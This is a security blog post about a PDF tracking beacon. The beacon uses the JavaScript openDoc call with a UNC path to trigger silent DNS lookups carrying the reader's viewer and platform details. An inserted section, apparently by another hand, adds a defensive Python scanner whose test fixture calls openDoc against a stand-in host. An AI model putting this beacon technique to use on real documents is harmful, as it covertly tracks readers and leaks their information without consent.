PDF Beacons with JavaScript openDoc API

May 2, 2013 • Uncategorized

I saw earlier in the week that McAfee had disclosed an information leak through one of the PDF JavaScript APIs. While it wasn’t exactly spelled out, I recognized the bug description as one I had reversed back in May of 2012. Why didn’t it hit the public then? Well, it wasn’t that interesting, and I felt the tracking capability was worthwhile, especially when documents were getting stolen. It seems this capability will be gone in a few days/weeks, so to the blog it goes.

The document I received back in May appeared to have been created by one of the email tracking services and had a generic theme. The JavaScript was heavily obfuscated, but after an hour or two I ended up with a version-checking tree that picks the outbound communication method to use for the reader in question. What struck me as interesting was the final call, which used the “openDoc” method. I had previously tried to use openDoc to leak data, but without success.

In the code I dealt with, openDoc was passed the arguments “cPath”, “cFS” and “bHidden”. Each argument is explained below:

    • cPath – the location of the document/path
    • cFS – the file system type to use
    • bHidden – whether or not to open the document at that path

    The code I encountered set the cPath to something like “\\your.domain.to.query\/path/to/current/document\name_of_doc_to_open.pdf”, the cFS to “DOS” and the bHidden to true, though I don’t think that matters too much.

If executed, the document would not prompt the user, and a stream of DNS requests to the specified domain would follow. What was nice about this read tracker was that it went further and collected some information about the client, though not all of it. I tooled this up for testing and added the following details to collect:

    • ViewerType – Type of viewer the user is reading (Adobe, Web, etc.)
    • ViewVersion – Version of the PDF reader
    • AppLanguage – The PDF reader’s configured language
    • AppPlatform – Operating system used to open the PDF

    I appended these to the actual DNS request so that it looked like this:

    [image: the emitted DNS request]

In the blog post McAfee put out, they show HTTP traffic, but I was never able to get such details. Possibly there is something I have missed, they are using a different call altogether, or Adobe 11 simply handles this call differently. If you are interested in playing around with the code and a sample document, please email me or obtain the sample from VirusTotal.
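For anyone triaging PDFs for this kind of read beacon, here is an added example (not the author's tracker code or sample document) of a small Python scanner that inflates FlateDecode streams and flags the indicators described above: embedded JavaScript, an openDoc call, cFS set to “DOS”, and the UNC host in cPath that the reader would resolve. The test PDFs and the host name are constructed for the example.

```python
import re
import zlib

# Constructed test inputs (not the sample from the post): one JavaScript action calls
# app.openDoc with a UNC cPath and cFS "DOS", as described above; the other is benign.
BEACON_JS = rb'app.openDoc({cPath: "\\\\beacon.example.invalid\\doc.pdf", cFS: "DOS", bHidden: true});'
BENIGN_JS = rb'app.alert("hello");'

# A (one-level-nested) PDF dictionary followed by its stream body.
STREAM_RE = re.compile(rb"<<((?:[^<>]|<<[^<>]*>>)*)>>\s*stream\r?\n(.*?)\r?\nendstream", re.S)
OPENDOC_RE = re.compile(rb"openDoc\s*\(")
# Eight backslashes in the pattern match the four that open an escaped UNC path in JS source.
UNC_HOST_RE = re.compile(rb"cPath\s*:\s*[\"']\\\\\\\\([A-Za-z0-9.\-]+)")

def build_pdf(js: bytes, compress: bool) -> bytes:
    """Build a minimal PDF whose OpenAction runs the given JavaScript (test fixture only)."""
    body = zlib.compress(js) if compress else js
    filt = b"/Filter /FlateDecode " if compress else b""
    return (b"%PDF-1.7\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
            b"3 0 obj << /S /JavaScript /JS 4 0 R >> endobj\n"
            b"4 0 obj << /Length " + str(len(body)).encode() + b" " + filt + b">>\n"
            b"stream\n" + body + b"\nendstream\nendobj\ntrailer << /Root 1 0 R >>\n%%EOF\n")

def decoded_view(pdf: bytes) -> bytes:
    """Raw bytes plus the inflated content of every FlateDecode stream, so the
    indicator regexes see literal, uncompressed and compressed JavaScript alike."""
    parts = [pdf]
    for dict_bytes, body in STREAM_RE.findall(pdf):
        if b"FlateDecode" in dict_bytes:
            try:
                parts.append(zlib.decompress(body))
            except zlib.error:
                pass  # damaged or multi-filter stream; keep scanning the rest
    return b"\n".join(parts)

def scan_opendoc_beacon(pdf: bytes) -> dict:
    """Report the openDoc beacon indicators from the post: JavaScript present,
    an openDoc call, cFS set to DOS, and the UNC host(s) the reader would resolve."""
    text = decoded_view(pdf)
    hosts = [h.decode(errors="replace") for h in UNC_HOST_RE.findall(text)]
    return {
        "has_javascript": re.search(rb"/(JS|JavaScript)\b", text) is not None,
        "calls_opendoc": OPENDOC_RE.search(text) is not None,
        "uses_dos_fs": re.search(rb"cFS\s*:\s*[\"']DOS[\"']", text) is not None,
        "unc_hosts": hosts,
        "beacon_suspected": OPENDOC_RE.search(text) is not None and bool(hosts),
    }
```

Obfuscated scripts like the one in the post will hide the literal `openDoc` string, so treat a hit as a strong signal and a miss as nothing more than "no plain-text indicator"; the UNC hosts it does extract are what to block or watch for in DNS logs.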

    [image: the tracking code]

I generated the sample using HeavyPint and the code pictured above, without any exploit, so it’s safe.
